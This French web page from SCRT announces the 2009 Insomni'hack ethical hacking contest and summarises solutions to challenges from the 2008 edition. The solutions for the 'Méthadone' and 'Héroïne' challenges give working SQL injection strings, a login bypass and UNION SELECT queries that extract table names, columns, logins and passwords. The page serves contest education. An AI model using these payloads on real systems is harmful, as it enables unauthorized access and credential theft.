SCRT - les concours de hacking Insomni'hack

Suite au succès de sa première édition, Insomni'hack revient en 2009. Réservez d'ores et déjà la date du
Vendredi 6 Février 2009
Le lieu exact de l'événement n'est pas encore fixé, mais il s'agira d'un emplacement en suisse romande. Des informations complémentaires se trouveront sur ce site dès que possible.

Préparez-vous à vous mesurer aux diverses épreuves touchant à plusieurs domaines de la sécurité des systèmes d'informations dans le plus grand challenge de hacking éthique de suisse romande.

Si vous souhaitez vous enregistrer à cet événement, envoyez un mail avec insomnihack 09 dans le sujet à :

Nous nous réjouissons de vous voir sur place!

Le 8 février 2008, SCRT a organisé le premier concours de Ethical Hacking de Suisse romande.

Le concours est maintenant terminé.

Plus de 60 participants se seront affrontés sur différentes épreuves touchant à divers domaines de la sécurité des systèmes d'information.

pics1

Les épreuves

Nous allons présenter ici les solutions de quelques unes des épreuves auxquelles les candidats ont été confrontés.

No	Nom du challenge	Points	Accès (lors du concours)
-	-	-
1	Methadone	200	hackthis.insomni.hack/methadone
6	Highlander	600	begin.insomni.hack
8	Oxymore	200	hackthis.insomni.hack/oxymore
9	NoNo	100	hackthis.insomni.hack/NoNo
5	Ventriloque	600	www.insomni.hack/ventriloque
3	Cherche&Trouve	1000	www.insomni.hack/cherche&trouve
2	Héroïne	800	hackthis.insomni.hack/heroine
7	Cascade Scoubidou	200	www.insomni.hack/cascade
7	Cascade orthodoxe	400	www.insomni.hack/cascade
7	Cascade de chiffres	600	www.insomni.hack/cascade
7	Cascade old-school	800	www.insomni.hack/cascade
10	OUAIP	500

Epreuve 1 : méthadone
Il s'agissait d'une simple injection SQL
un simple ' OR 'x'='x permettait de contourner la protection par login mot de passe.

Epreuve 2 : Heroïne
De nouveau une injection SQL, mais ... un peu plus compliquée.
Pour passer cette épreuves, les étapes étaient les suivantes :
Récupérer le nom de la table : ' OR 'x' = 'x' UNION SELECT table_name FROM information_schema.tables WHERE '\%'='\
Récupérer les colonnes : ' OR 'x' = 'x' UNION SELECT column_name FROM information_schema.columns WHERE '\%'='\
Récupérer le login : ' OR 'x' = 'x' UNION SELECT identifiant FROM membres WHERE '\%'='\ Récupérer le password : ' OR 'x' = 'x' UNION SELECT motpasse FROM membres WHERE '\%'='\

Epreuve 3 : Cherche & trouve
2 approches possibles : reverse engineering (recherche des 2 algos utilisés) ou scripting/brute force (combinaison de différents algos et comparaison des résultats de sortie)

Epreuve 7 : Cascade
Solution de l'épreuve 7 (Cascade) préparée par Bruno Kerouanton

Epreuve 10 : Ouaip
Comme son nom l'indique, pour cette épreuve les candidats devaient cracker le réseau WEP (64 bits) qui était disponible lors de l'épreuve.

Concours Insomni'hack : Ethical Hacking contest

Insomni'Hack 09

Insomni'Hack 08

Les épreuves